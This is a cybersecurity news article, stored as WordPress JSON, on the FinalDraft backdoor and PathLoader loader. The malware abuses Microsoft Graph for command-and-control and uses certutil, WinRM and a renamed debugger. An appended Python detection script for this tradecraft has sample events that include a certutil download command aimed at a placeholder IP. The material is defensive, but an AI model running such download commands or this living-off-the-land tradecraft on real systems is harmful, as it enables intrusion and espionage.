{"id":1964,"date":"2025-02-17T21:49:51","date_gmt":"2025-02-17T21:49:51","guid":{"rendered":"https:\/\/cybersecurityinfocus.com\/?p=1964"},"modified":"2025-02-17T21:49:51","modified_gmt":"2025-02-17T21:49:51","slug":"new-family-of-data-stealing-malware-leverages-microsoft-outlook","status":"publish","type":"post","link":"https:\/\/cybersecurityinfocus.com\/?p=1964","title":{"rendered":"New family of data-stealing malware leverages Microsoft Outlook"},"content":{"rendered":"<div>\n<div class=\"grid grid--cols-10@md grid--cols-8@lg article-column\">\n<div class=\"col-12 col-10@md col-6@lg col-start-3@lg\">\n<div class=\"article-column__content\">\n<p>CISOs have yet another attack vector to worry about with the discovery of a new family of data-stealing malware that uses Microsoft Outlook as a command-and-control channel by abusing the Microsoft Graph API, and that carries a pass-the-hash capability for reusing stolen NTLM password hashes.<\/p>\n<p>Researchers from Elastic Security say the malware was created by an unnamed group targeting the foreign ministry of a South American nation, but there are also links to compromises at a university in Southeast Asia and at telecoms in that region.<\/p>\n<p>The campaign is characterized by a \u201cwell-engineered, highly-capable, novel intrusion set,\u201d the researchers <a href=\"https:\/\/www.elastic.co\/security-labs\/fragile-web-ref7707\">say in a report.<\/a><\/p>\n<p>The campaign against the South American country may have started in November 2024. That\u2019s when Elastic Security detected a tight cluster of endpoint behavioral alerts within the country\u2019s Foreign Ministry. It isn\u2019t clear how the IT system was initially compromised, but the gang used living-off-the-land tactics once inside. 
That included using Windows\u2019 <em>certutil<\/em> utility, a certificate-management tool, to download files.<\/p>\n<p>Espionage seems to be the motive, says the report, and there are Windows and Linux versions of the malware. But fortunately the gang \u201cexhibited poor campaign management and inconsistent evasion tactics,\u201d it notes.<\/p>\n<h2 class=\"wp-block-heading\">Watch for the signs<\/h2>\n<p>Nevertheless, CISOs should be watching for signs of attack using this group\u2019s techniques, because its targets could become more widespread and the techniques more sophisticated.<\/p>\n<p>One thing CISOs should immediately note: after initial compromise, the gang used the Windows Remote Management (WinRM) remote shell plugin (<em>WinrsHost.exe<\/em>), the process that hosts commands sent over WinRM remote shell sessions, to download files. These included an executable and .rar, .ini and .log files. The executable is a renamed copy of <em>CDB.exe<\/em>, a Microsoft-signed debugger. Abusing this binary, the report notes, let the attackers execute malicious shellcode delivered in a <em>config.ini<\/em> file under the cover of a trusted, signed program.<\/p>\n<p>Using WinRM\u2019s shell plugin \u201cindicates that attackers already possessed valid network credentials and were using them for lateral movement from a previously compromised host in the environment,\u201d the report says. \u201cHow these credentials were obtained is unknown.\u201d<\/p>\n<p>Preventing lateral movement is always tricky if an attacker has obtained valid credentials, noted Johannes Ullrich, dean of research at the SANS Institute, in an email to CSO. 
\u201cThey could come from other breaches (credential stuffing) or maybe just from keystroke loggers or info stealers they may have deployed during earlier phases of the attack that are not covered in the writeup.\u201d<\/p>\n<p>The malware\u2019s main components are a loader and a backdoor:<\/p>\n<p><strong>PathLoader<\/strong>, a lightweight Windows executable that downloads and executes encrypted shellcode hosted on a remote server. It uses anti-sandbox techniques to avoid executing immediately inside a target organization\u2019s sandbox, and it hinders static analysis with API hashing and string encryption;<\/p>\n<p><strong>FinalDraft<\/strong>, a 64-bit backdoor written in C++ that focuses on data exfiltration and process injection. It carries several modules that it can inject into other processes; their output is forwarded to a command-and-control (C2) server.<br \/>On first run it gathers information about the compromised host, including the computer name, the account username, internal and external IP addresses, and details of running processes. FinalDraft also includes a pass-the-hash toolkit, similar to Mimikatz, for authenticating with stolen NTLM hashes rather than passwords.<\/p>\n<p>One C2 channel runs over the Outlook mail service via the Microsoft Graph API, the API through which developers access resources hosted on Microsoft cloud services, including Microsoft 365. Calls to the API require an access token, and FinalDraft is able to obtain a Graph API token of its own. Because the traffic goes to legitimate Microsoft endpoints, it blends in with ordinary Microsoft 365 activity. <a href=\"https:\/\/www.security.com\/threat-intelligence\/graph-api-threats\">According to a report by Symantec last year,<\/a> a growing number of threat actors are abusing the Graph API to hide their communications.<\/p>\n<p>In addition, FinalDraft can start a TCP listener after adding an allow rule to the Windows Firewall; the rule is removed when the listener shuts down. 
It can also delete files, overwriting their contents with zeros first so that they cannot be recovered.<\/p>\n<p>\u201cI think this is a great example of using the \u2018living-off-the-land\u2019 (LOLBins) technique to its fullest potential,\u201d commented Ullrich. \u201cThis points to an adversary who did their homework to customize this attack to most effectively hit this target. An attack like this is truly difficult to defend against. The \u2018Advanced\u2019 in APT [advanced persistent threat] is often more visible in this preparation vs the actual tools used and execution of an attack.\u201d<\/p>\n<h2 class=\"wp-block-heading\">Detection rules<\/h2>\n<p>At the end of its report, Elastic Security lists several YARA rules it created and posted on GitHub to help defenders. These rules <a href=\"https:\/\/github.com\/elastic\/protections-artifacts\/blob\/main\/yara\/rules\/Windows_Trojan_PathLoader.yar\" target=\"_blank\" rel=\"noopener\">detect PathLoader<\/a> and <a href=\"https:\/\/github.com\/elastic\/protections-artifacts\/blob\/main\/yara\/rules\/Windows_Trojan_FinalDraft.yar\" target=\"_blank\" rel=\"noopener\">FinalDraft<\/a> on Windows, while this <a href=\"https:\/\/github.com\/elastic\/protections-artifacts\/blob\/main\/yara\/rules\/Linux_Trojan_FinalDraft.yar\" target=\"_blank\" rel=\"noopener\">rule detects FinalDraft on Linux<\/a>.<\/p>\n\n<\/div>\n<\/div>\n<\/div>\n<\/div>","protected":false},"excerpt":{"rendered":"<p>CISOs have yet another attack vector to worry about with the discovery of a new family of data-stealing malware that uses Microsoft Outlook as a command-and-control channel by abusing the Microsoft Graph API, and that carries a pass-the-hash capability for reusing stolen NTLM password hashes. 
Researchers from Elastic Security say the malware was created by an unnamed group targeting [&hellip;]<\/p>\n","protected":false},"author":0,"featured_media":1965,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[],"class_list":["post-1964","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-education"],"_links":{"self":[{"href":"https:\/\/cybersecurityinfocus.com\/index.php?rest_route=\/wp\/v2\/posts\/1964"}],"collection":[{"href":"https:\/\/cybersecurityinfocus.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/cybersecurityinfocus.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"replies":[{"embeddable":true,"href":"https:\/\/cybersecurityinfocus.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1964"}],"version-history":[{"count":0,"href":"https:\/\/cybersecurityinfocus.com\/index.php?rest_route=\/wp\/v2\/posts\/1964\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/cybersecurityinfocus.com\/index.php?rest_route=\/wp\/v2\/media\/1965"}],"wp:attachment":[{"href":"https:\/\/cybersecurityinfocus.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1964"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/cybersecurityinfocus.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=1964"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/cybersecurityinfocus.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=1964"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}
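The behaviours the article describes (certutil used as a downloader, commands spawned under WinrsHost.exe, a renamed signed debugger executing shellcode from config.ini, and Graph API traffic from a process that has no reason to talk to Microsoft 365) each leave a footprint in endpoint telemetry. The following is an added Python example, not code from the article or from Elastic Security's published YARA rules, showing how those behaviours can be turned into process- and network-level detections. It runs over a handful of constructed Sysmon-style events; the field names, the process allowlist for Graph endpoints and the detection names are assumptions made for the example.

```python
"""Behavioural detections for the living-off-the-land tradecraft in the article.

Added example; not Elastic Security's code. Event fields mirror Sysmon's
Event ID 1 (process creation) and Event ID 3 (network connection). The
sample events at the bottom are constructed for illustration only.
"""
import ntpath
import re
from dataclasses import dataclass


@dataclass
class Event:
    kind: str                # "process" or "network"
    image: str               # full path of the executing binary
    parent: str = ""         # parent process path (process events)
    cmdline: str = ""        # command line (process events)
    original_name: str = ""  # PE OriginalFileName from the version resource
    dest_host: str = ""      # destination hostname (network events)


# Processes that legitimately reach Microsoft Graph / Entra token endpoints.
# Assumption for this example: tune the allowlist to the tenant.
GRAPH_ALLOWLIST = {"outlook.exe", "teams.exe", "onedrive.exe", "msedge.exe", "chrome.exe"}
GRAPH_HOSTS = {"graph.microsoft.com", "login.microsoftonline.com"}
URL_RE = re.compile(r"https?://", re.IGNORECASE)


def _base(path: str) -> str:
    """Lower-cased file name of a Windows path; ntpath handles backslashes on any OS."""
    return ntpath.basename(path).lower()


def detect(ev: Event) -> list[str]:
    """Return the names of every detection that fires for one event."""
    hits: list[str] = []
    if ev.kind == "process":
        image = _base(ev.image)
        # 1. certutil used as a downloader: URL cache switch or a URL on the command line.
        if image == "certutil.exe" and ("urlcache" in ev.cmdline.lower() or URL_RE.search(ev.cmdline)):
            hits.append("certutil_download")
        # 2. Any child of the WinRM remote-shell host means someone is running
        #    commands over WinRM with valid credentials; worth reviewing every time.
        if _base(ev.parent) == "winrshost.exe":
            hits.append("winrshost_child")
        # 3. A signed binary renamed on disk: the PE's OriginalFileName no longer
        #    matches the file name (CDB.EXE running under another name, for instance).
        if ev.original_name and ev.original_name.lower() != image:
            hits.append("renamed_signed_binary")
            if ev.original_name.lower() == "cdb.exe":
                hits.append("renamed_cdb_debugger")
    elif ev.kind == "network":
        # 4. Graph API or token endpoint reached by an unexpected process: the
        #    Outlook-over-Graph C2 channel looks like this on the endpoint.
        if ev.dest_host.lower() in GRAPH_HOSTS and _base(ev.image) not in GRAPH_ALLOWLIST:
            hits.append("graph_api_unexpected_process")
    return hits


def scan(events: list[Event]) -> dict[str, list[str]]:
    """Map each detection name to the images that triggered it."""
    out: dict[str, list[str]] = {}
    for ev in events:
        for name in detect(ev):
            out.setdefault(name, []).append(ev.image)
    return out


# Constructed sample telemetry (not real incident data).
SAMPLE_EVENTS = [
    Event("process", r"C:\Windows\System32\certutil.exe",
          parent=r"C:\Windows\System32\cmd.exe",
          cmdline="certutil -urlcache -split -f http://203.0.113.10/pkg.rar C:\\ProgramData\\pkg.rar",
          original_name="CertUtil.exe"),
    Event("process", r"C:\ProgramData\dbg\update.exe",
          parent=r"C:\Windows\System32\winrshost.exe",
          cmdline=r"C:\ProgramData\dbg\update.exe -cf config.ini",
          original_name="CDB.Exe"),
    Event("process", r"C:\Windows\System32\cmd.exe",
          parent=r"C:\Windows\explorer.exe", cmdline="cmd.exe", original_name="Cmd.Exe"),
    Event("network", r"C:\ProgramData\dbg\update.exe", dest_host="graph.microsoft.com"),
    Event("network", r"C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE",
          dest_host="graph.microsoft.com"),
]

if __name__ == "__main__":
    for name, images in scan(SAMPLE_EVENTS).items():
        print(f"{name}: {images}")
```

The renamed-binary check is the one that catches the CDB.exe trick regardless of what the attacker calls the file, because the OriginalFileName lives in the signed PE's version resource and survives a rename; the Graph check is only as good as the allowlist, so it should be built from the tenant's own baseline rather than copied from here.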